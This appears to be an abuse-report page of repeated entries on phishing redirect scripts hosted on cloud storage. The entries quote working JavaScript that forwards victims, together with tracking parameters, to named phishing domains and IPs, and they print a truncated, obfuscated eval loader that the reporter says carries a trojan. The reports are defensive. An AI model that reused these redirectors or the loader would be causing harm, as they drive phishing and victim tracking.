https://storage.googleapis.com/ottenuto/incontrano.html
Google does not take actions after compla ...
show morehttps://storage.googleapis.com/ottenuto/incontrano.html
Google does not take actions after complaining
Content of html:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "spomouth.fyi";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Script reads parameters after #, and parses them to spomouth.fyi, in order to redirect victims to the phishing website and to track the success of the spam mail.
spomouth.fyi is malicious:
See
https://www.virustotal.com/gui/domain/spomouth.fyi
https://urlscan.io/search/#spomouth.fyi
show less
m.bmw-motorrad.com
Source:
https://storage.googleapis.com/samak867asamaka65/redirectlobla.html
...
show morem.bmw-motorrad.com
Source:
https://storage.googleapis.com/samak867asamaka65/redirectlobla.html
Content:
<script>document.location.href = 'http://m.bmw-motorrad.com//anchor'+window.location.href.split('#')[1];</script>
Script used to pass thru parameters which reload victims to the phishing domain m.bmw-motorrad.com and which reveal the success of the spamming email.
Malicious:
see https://urlscan.io/search/#m.bmw-motorrad.com
https://www.virustotal.com/gui/domain/m.bmw-motorrad.com
show less
https://storage.googleapis.com/ottenuto/incontrano.html
Google does not take actions after compla ...
show morehttps://storage.googleapis.com/ottenuto/incontrano.html
Google does not take actions after complaining
Content of html:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "spomouth.fyi";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Script reads parameters after #, and parses them to spomouth.fyi, in order to redirect victims to the phishing website and to track the success of the spam mail.
spomouth.fyi is malicious:
See
https://www.virustotal.com/gui/domain/spomouth.fyi
https://urlscan.io/search/#spomouth.fyi
show less
https://storage.googleapis.com/ottenuto/incontrano.html
Content of html:
<script>
var tarcking ...
show morehttps://storage.googleapis.com/ottenuto/incontrano.html
Content of html:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "spomouth.fyi";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Script reads parameters after #, and parses them to spomouth.fyi, in order to redirect victims to the phishing website and to track the success of the spam mail.
spomouth.fyi is malicious:
See
https://www.virustotal.com/gui/domain/spomouth.fyi
https://urlscan.io/search/#spomouth.fyi
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
<script>document.location.href = 'http://bw-networkx.net//anchor'+window.location.href.split('#')[1];</script>
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
@RIPE Velia.net does not take down the malicious content. Time to take action, dear fellows of RIPE, please remove IP range for this provider…
show less
intotechworld.com
Part of the reload chain used by phishing criminals
Evidence?
See https://w ...
show moreintotechworld.com
Part of the reload chain used by phishing criminals
Evidence?
See https://www.virustotal.com/gui/domain/intotechworld.com
https://urlscan.io/search/#intotechworld.com
show less
https://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this ...
show morehttps://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this malicious content.
has the following content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.129.110";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to 185.80.129.110
Malicious IP:
https://www.virustotal.com/gui/ip-address/185.80.129.110
https://urlscan.io/search/#185.80.129.110
[email protected] does not take action to remove the content on this IP
@RIPE: it is time to remove all IP-ranges from VPSNET.LT. Reporting abuse has no effect.
show less
techtrekeducation.click
https://s3.amazonaws.com/olakdcfvdgftyunedfgud-olmkdxcdfrtykhe/pilokalnbf ...
show moretechtrekeducation.click
https://s3.amazonaws.com/olakdcfvdgftyunedfgud-olmkdxcdfrtykhe/pilokalnbfgdtesxd.html
Source:
<html lang="en">
<head>
<meta charset="utf-8">
</head>
<body>
<script>
window.location.replace("http://techtrekeducation.click/" + location.hash.slice(1));
</script>
</body>
</html>
Script is used to redirect victims to another domain and to pass through dome parameters to track victims.
show less
https://storage.googleapis.com/ibhsalestopw/hreeflink.html
Content:
<script>
var tarcking_par ...
show morehttps://storage.googleapis.com/ibhsalestopw/hreeflink.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.34.52.226";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Script is used to track the success of the spam and to redirect victims to phising IP.
Malicious:
See https://www.virustotal.com/gui/ip-address/185.34.52.226
https://urlscan.io/search/#185.34.52.226
If you report this IP to [email protected] nothing happens. So, RIPE, time to remove all IP ranges for this malicious provider…
Complaints to google cloud using abuse webform does not remove this malicious content, nor does it stop the malicious users…
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
<script>document.location.href = 'http://bw-networkx.net//anchor'+window.location.href.split('#')[1];</script>
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
@RIPE Velia.net does not take down the malicious content. Time to take action, dear fellows of RIPE, please remove IP range for this provider…
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
<script>document.location.href = 'http://bw-networkx.net//anchor'+window.location.href.split('#')[1];</script>
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
<script>document.location.href = 'http://bw-networkx.net//anchor'+window.location.href.split('#')[1];</script>
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
show less
zeroupper.com
https://www.zeroupper.com/dope/
Has the following content:
<script>
document.l ...
show morezeroupper.com
https://www.zeroupper.com/dope/
Has the following content:
<script>
document.location="https://www.saudialyawm.com/belgiquedouane"
</script>
So, it reloads to www.saudialyawm.com/belgiquedouane
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
show less
https://storage.googleapis.com/adb23topofferwww/hrefly.html
Content:
<script>
var tarcking_para ...
show morehttps://storage.googleapis.com/adb23topofferwww/hrefly.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.129.239";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to malicious IP 185.80.129.239:
https://www.virustotal.com/gui/ip-address/185.80.129.239
Google does not take down the reported content
Sending complaints to [email protected] has neither any effect.
So RIPE, time to take action against VPSNET-AS
org-name: UAB ESNET
country: LT
org-type: LIR
address: Zuvedru 36
address: LT10103
address: Vilnius
address: LITHUANIA
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
show less
https://storage.googleapis.com/luxhfgbh5756/newauieuaia.html
Content of html:
<script>
var tarc ...
show morehttps://storage.googleapis.com/luxhfgbh5756/newauieuaia.html
Content of html:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "spomouth.fyi";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Script reads parameters after #, and parses them to spomouth.fyi, in order to redirect victims to the phishing website and to track the success of the spam mail.
Google does not take down the malicious content on google cloud…
spomouth.fyi is malicious:
See
https://www.virustotal.com/gui/domain/spomouth.fyi
https://urlscan.io/search/#spomouth.fyi
show less
https://storage.googleapis.com/luxhfgbh5756/newauieuaia.html
Content of html:
<script>
var tarc ...
show morehttps://storage.googleapis.com/luxhfgbh5756/newauieuaia.html
Content of html:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "spomouth.fyi";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Script reads parameters after #, and parses them to spomouth.fyi, in order to redirect victims to the phishing website and to track the success of the spam mail.
Google does not take down the malicious content on google cloud…
spomouth.fyi is malicious:
See
https://www.virustotal.com/gui/domain/spomouth.fyi
https://urlscan.io/search/#spomouth.fyi
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
show less
rachaelariella.com
Includes javascript with trojan:
See
https://www.virustotal.com/gui/file/1ff ...
show morerachaelariella.com
Includes javascript with trojan:
See
https://www.virustotal.com/gui/file/1ffb067a0c297a7971f373447a7a9ff182120cab28b2ebc97edbda733f36b8e5/detection
show less
rachaelariella.com
Has the following script:
<script type="text/javascript">var _0xc9e=["","spl ...
show morerachaelariella.com
Has the following script:
<script type="text/javascript">var _0xc9e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe66c(d,e,f){var g=_0xc9e[2][_0xc9e[1]](_0xc9e[0]);var h=g[_0xc9e[3]](0,e);var i=g[_0xc9e[3]](0,f);var j=d[_0xc9e[1]](_0xc9e[0])[_0xc9e[10]]()[_0xc9e[9]](function(a,b,c){if(h[_0xc9e[4]](b)!==-1)return a+=h[_0xc9e[4]](b)*(Math[_0xc9e[8]](e,c))},0);var k=_0xc9e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc9e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe66c(s,e,10)-t)}return decodeURIComponent(escape(r))}("YrDDYnYrDYYnYDYDDnYDYrDnYDYYYnYDYYrnYDYDDnYDYDYnYDrDYnrYrrnYDYYDnYDYrrnYrYDnYrDYYnYrYrDnYrDYDnYrrYDnYrYYYnYrDYrnYrYYrnYrrDrnYDDYYnYrDDrnYrYrDnYrDYYnYrrrYnYDDYYnYrrDYnYrrDrnYrrrYnYrYYDnYrDYrnYDDYYnYrDYDnYr
show less
bw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.ht ...
show morebw-networkx.net
Redirect from
https://storage.googleapis.com/noda646aw555anode/here1235yfdtsf.html
Source code:
Script redirects victims to
http://bw-networkx.net//anchor and parses some codes through to track the victim.
Google does not remove content , even after complaining
bw-networkx.net is malicious:
https://www.virustotal.com/gui/domain/bw-networkx.net
https://urlscan.io/search/#bw-networkx.net
show less
PhishingEmail Spam
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.